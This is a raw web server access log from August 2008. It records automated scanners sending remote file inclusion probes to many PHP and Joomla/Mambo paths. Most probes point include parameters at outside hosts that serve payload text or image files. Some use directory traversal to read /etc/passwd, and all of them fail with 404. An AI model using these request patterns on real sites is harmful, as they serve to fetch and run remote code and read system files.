74.53.240.146 - - [24/Aug/2008:10:45:47 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.208.106 - - [24/Aug/2008:10:45:49 -0700] "GET /logs/default.php?page=http://aocbots.com/cms/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
67.18.208.106 - - [24/Aug/2008:10:45:50 -0700] "GET /default.php?page=http://aocbots.com/cms/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:45:55 -0700] "GET /logs/access_080519.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:45:55 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:45:55 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:45:56 -0700] "GET /logs/access_080622.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.40.56.32 - - [24/Aug/2008:10:45:57 -0700] "GET /index2.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.40.56.32 - - [24/Aug/2008:10:45:57 -0700] "GET /logs/index2.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:10:46:01 -0700] "GET /logs/access_080713.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:46:02 -0700] "GET /logs/access_080519.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:46:03 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:46:03 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:10:46:03 -0700] "GET /logs/access_080711.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:46:03 -0700] "GET /logs/access_080622.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.40.56.32 - - [24/Aug/2008:10:46:09 -0700] "GET /logs/access_080424.log/index2.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.40.56.32 - - [24/Aug/2008:10:46:09 -0700] "GET /logs/access_080225.log/index2.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:46:20 -0700] "GET /logs/access_080620.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:46:21 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:46:21 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:10:46:49 -0700] "GET /logs/access_080312.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
66.249.67.135 - - [24/Aug/2008:10:46:59 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0039.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" "dmulk.com"
80.67.20.130 - - [24/Aug/2008:10:47:02 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:47:06 -0700] "GET /logs/access_080622.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:47:06 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:47:06 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:47:11 -0700] "GET /logs/access_080519.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:10:47:27 -0700] "GET /logs/access_080601.log//components/com_smf/smf.php?mosConfig_absolute_path=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:10:47:28 -0700] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:10:47:28 -0700] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:10:47:34 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:10:47:34 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:10:47:34 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
80.237.152.109 - - [24/Aug/2008:10:47:34 -0700] "GET /logs/access_080312.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
91.200.212.3 - - [24/Aug/2008:10:48:06 -0700] "GET /logs/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.200.212.3 - - [24/Aug/2008:10:48:06 -0700] "GET /plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:10:48:28 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
198.145.244.100 - - [24/Aug/2008:10:48:56 -0700] "GET /logs/main.php?x=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.145.244.100 - - [24/Aug/2008:10:48:56 -0700] "GET /main.php?x=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:49:42 -0700] "GET /logs/access_080621.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:10:49:59 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.111.11.7 - - [24/Aug/2008:10:49:59 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:10:49:59 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.237.152.109 - - [24/Aug/2008:10:50:29 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
80.237.152.109 - - [24/Aug/2008:10:50:29 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
80.237.152.109 - - [24/Aug/2008:10:50:30 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
198.145.244.100 - - [24/Aug/2008:10:50:34 -0700] "GET /logs/access_080713.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.145.244.100 - - [24/Aug/2008:10:50:37 -0700] "GET /logs/access_080711.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.111.11.7 - - [24/Aug/2008:10:50:38 -0700] "GET /logs/access_080121.log/myevent.php?myevent_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [24/Aug/2008:10:50:40 -0700] "GET /myevent.php?myevent_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [24/Aug/2008:10:50:42 -0700] "GET /logs/myevent.php?myevent_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.97.183.24 - - [24/Aug/2008:10:50:50 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.97.183.24 - - [24/Aug/2008:10:50:51 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:10:50:57 -0700] "GET /logs/access_080312.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:51:13 -0700] "GET /logs/access_080621.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.243.226 - - [24/Aug/2008:10:51:29 -0700] "GET /logs/access_080718.log/index2.php?includes_dir=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
74.53.243.226 - - [24/Aug/2008:10:51:29 -0700] "GET /index2.php?includes_dir=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
74.53.243.226 - - [24/Aug/2008:10:51:29 -0700] "GET /logs/index2.php?includes_dir=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
89.111.184.180 - - [24/Aug/2008:10:51:31 -0700] "GET //include/admin.lib.inc.php?site_path=http://fratore.altervista.org/ufficio/tommy.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
89.111.184.180 - - [24/Aug/2008:10:51:31 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://fratore.altervista.org/ufficio/tommy.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
193.111.11.7 - - [24/Aug/2008:10:51:35 -0700] "GET /page.php?doc=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:51:38 -0700] "GET /logs//myspeach/jscript.php?my_ms[root]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:51:39 -0700] "GET //myspeach/jscript.php?my_ms[root]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.54.60 - - [24/Aug/2008:10:51:53 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.54.60 - - [24/Aug/2008:10:51:54 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.243.226 - - [24/Aug/2008:10:52:01 -0700] "GET /logs/access_080811.log/index2.php?includes_dir=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.225.213.56 - - [24/Aug/2008:10:52:10 -0700] "GET /logs/access_080303.log/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hepsiindirimli.com/var/skins_repository/default_green/tumbs.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.213.56 - - [24/Aug/2008:10:52:19 -0700] "GET /logs/access_080201.log/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hepsiindirimli.com/var/skins_repository/default_green/tumbs.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
119.70.40.101 - - [24/Aug/2008:10:52:28 -0700] "GET /logs/access_071026.log HTTP/1.0" 200 67672 "http://www.google.com/search?hl=en&q=tutorial&btnG=Google+Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; AtHome0107; .NET CLR 1.1.4322)" "www.dmulk.com"
66.40.56.32 - - [24/Aug/2008:10:52:50 -0700] "GET /logs/access_080711.log%20/index2.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:53:20 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:53:21 -0700] "GET /logs/access_080807.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:53:27 -0700] "GET /logs/access_080621.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:10:53:27 -0700] "GET /logs/access_080804.log/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:10:53:27 -0700] "GET /errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:10:53:27 -0700] "GET /logs/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.97.183.24 - - [24/Aug/2008:10:53:27 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.97.183.24 - - [24/Aug/2008:10:53:27 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:53:29 -0700] "GET /logs/access_080621.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:10:53:31 -0700] "GET /logs/access_080804.log/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:10:53:31 -0700] "GET /errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:10:53:31 -0700] "GET /logs/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.225.213.56 - - [24/Aug/2008:10:53:31 -0700] "GET /logs/access_080406.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hepsiindirimli.com/var/skins_repository/default_green/tumbs.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.213.56 - - [24/Aug/2008:10:53:47 -0700] "GET /logs/access_080405.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hepsiindirimli.com/var/skins_repository/default_green/tumbs.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:53:56 -0700] "GET /logs/access_080801.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:53:56 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:54:02 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:54:04 -0700] "GET /logs/access_080621.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:10:54:13 -0700] "GET /logs/access_080621.log/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:10:54:13 -0700] "GET /logs/access_080621.log/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:54:22 -0700] "GET /logs/access_080621.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:54:35 -0700] "GET /logs/access_080508.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
66.225.213.56 - - [24/Aug/2008:10:54:51 -0700] "GET /logs/access_080406.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hepsiindirimli.com/var/skins_repository/default_green/tumbs.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.74.239.166 - - [24/Aug/2008:10:54:58 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.taranakivista.co.nz/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.74.239.166 - - [24/Aug/2008:10:54:58 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.taranakivista.co.nz/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.58.154.237 - - [24/Aug/2008:10:55:01 -0700] "GET /logs/access_080621.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.225.213.56 - - [24/Aug/2008:10:55:06 -0700] "GET /logs/access_080405.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hepsiindirimli.com/var/skins_repository/default_green/tumbs.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.85.201.66 - - [24/Aug/2008:10:55:37 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [24/Aug/2008:10:55:38 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:55:41 -0700] "GET /logs/access_080804.log/phphtml.php?htmlclass_path=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
87.118.112.54 - - [24/Aug/2008:10:55:45 -0700] "GET /logs/access_080811.log///index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://62.141.54.164/.file/ghx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
